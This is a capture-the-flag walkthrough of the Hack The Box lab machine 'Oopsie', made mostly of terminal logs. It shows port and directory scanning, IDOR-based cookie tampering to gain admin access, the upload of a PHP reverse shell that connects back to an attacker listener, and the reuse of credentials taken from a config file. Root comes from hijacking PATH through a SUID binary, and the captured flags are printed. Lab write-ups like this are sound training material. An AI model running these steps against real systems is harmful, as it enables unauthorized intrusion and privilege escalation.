Port recognition withnmapor you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon oopsie.htb

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤
WWA for the #15 !

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-22 12:05 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Initiating Ping Scan at 12:05
Scanning oopsie.htb (10.129.58.8) [4 ports]
Completed Ping Scan at 12:05, 0.15s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:05
Scanning oopsie.htb (10.129.58.8) [65535 ports]
Discovered open port 22/tcp on 10.129.58.8
Discovered open port 80/tcp on 10.129.58.8
Completed SYN Stealth Scan at 12:05, 17.72s elapsed (65535 total ports)
NSE: Script scanning 10.129.58.8.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Nmap scan report for oopsie.htb (10.129.58.8)
Host is up (0.17s latency).
Not shown: 61952 closed tcp ports (reset), 3581 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

NSE: Script Post-scanning.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 18.06 seconds
           Raw packets sent: 87317 (3.842MB) | Rcvd: 72393 (2.896MB)


[+] [fuzzin server]
http://oopsie.htb [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], Email[admin@megacorp.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.129.58.8], Script, Title[Welcome]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 22 12:05:39 2022
URL_BASE: http://oopsie.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://oopsie.htb:80/ ----
==> DIRECTORY: http://oopsie.htb:80/css/                                                                                                                                                           
==> DIRECTORY: http://oopsie.htb:80/fonts/                                                                                                                                                         
==> DIRECTORY: http://oopsie.htb:80/images/                                                                                                                                                        
+ http://oopsie.htb:80/index.php (CODE:200|SIZE:10932)                                                                                                                                             
==> DIRECTORY: http://oopsie.htb:80/js/                                                                                                                                                            
+ http://oopsie.htb:80/server-status (CODE:403|SIZE:275)                                                                                                                                           
==> DIRECTORY: http://oopsie.htb:80/themes/                                                                                                                                                        
==> DIRECTORY: http://oopsie.htb:80/uploads/                                                                                                                                                       
                                                                                                                                                                                                   
-----------------
END_TIME: Fri Jul 22 12:18:06 2022
DOWNLOADED: 4612 - FOUND: 2

recon reports two ports 22 for ssh and 80 for webservice

┌──(root@ghost)-[/home/ghost]
└─# curl http://oopsie.htb/
...

<script src="/cdn-cgi/login/script.js"></script>
<script src="/js/index.js"></script>
</body>
</html>

After inspect website we obtain an interesting path /cdn-cgi/login

Let's try login as guest

Interesting url http://oopsie.htb/cdn-cgi/login/admin.php?content=accounts&id=2 maybe changing id=X we can display more users

Now we have admin Access ID value

As we can see it seems like changing some cookies values we have a possible attack vector to get into admin role

Setting our new cookies values as role:admin and user:34322

Now we are able to see that forbidden paths because we are administrator now

┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.10.14.68 1337 > rev.php

Generating reverse php shell with shellstorm.sh

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337

Starting netcat listener

┌──(root@ghost)-[/home/ghost]
└─# curl http://oopsie.htb/uploads/rev.php

Curling server path where our file was uploaded to call our reverse shell

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.68] from oopsie.htb [10.129.58.8] 36114
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:16:16 up  1:28,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python3
/usr/bin/python3
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@oopsie:/$ 

Connected, we made our shell fully interactive with python3 this time

www-data@oopsie:/$ ls /home/
ls /home/
robert
www-data@oopsie:/$ ls /home/robert
ls /home/robert
user.txt
www-data@oopsie:/$ cat /home/robert/user.txt
cat /home/robert/user.txt
f2c74ee8db7983851ab2a96a44eb7981

From here we can check user.txt flag

www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php  db.php  index.php  script.js
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
www-data@oopsie:/var/www/html/cdn-cgi/login$

We obtained robert credentials, it seems creds to a mysql db, we can try if robert reuse password for ssh

┌──(root@ghost)-[/home/ghost]
└─# ssh robert@oopsie.htb
The authenticity of host 'oopsie.htb (10.129.58.8)' can't be established.
ED25519 key fingerprint is SHA256:IzSXDs9dqcYA25jc85qIroMg43bjBJ8DEbPHmAEr8Nc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'oopsie.htb' (ED25519) to the list of known hosts.
robert@oopsie.htb's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jul 22 17:38:49 UTC 2022

  System load:  0.0               Processes:             117
  Usage of /:   40.5% of 6.76GB   Users logged in:       0
  Memory usage: 15%               IP address for ens160: 10.129.58.8
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

275 packages can be updated.
222 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Jan 25 10:20:16 2020 from 172.16.118.129
robert@oopsie:~$

And we get in ssh, time to elevate privileges

robert@oopsie:~$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
robert@oopsie:~$ find / -perm /6000 2>/dev/null

...

/usr/bin/passwd
/usr/bin/expiry
/usr/bin/wall
/usr/bin/mlocate
/usr/bin/at
/usr/bin/bugtracker
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/ssh-agent
/usr/bin/traceroute6.iputils
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo

Now we should focus on /usr/bin/bugtracker

robert@oopsie:~$ strings /usr/bin/bugtracker
...

AWAVI
AUATL
[]A\A]A^A_
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 
---------------
cat /root/reports/
;*3$"
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
crtstuff.c

After checking the suid program we can see is calling 'cat /root/reports/' looks the place to be for path hijacking

robert@oopsie:~$ cd /tmp
robert@oopsie:/tmp$ echo '/bin/bash' > cat
robert@oopsie:/tmp$ chmod +x cat
robert@oopsie:/tmp$ export PATH=/tmp:$PATH
robert@oopsie:/tmp$ bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 0
---------------

root@oopsie:/tmp# whoami
root
root@oopsie:/tmp# more /root/root.txt
af13b0bee69f8a877c3faf667f7beacf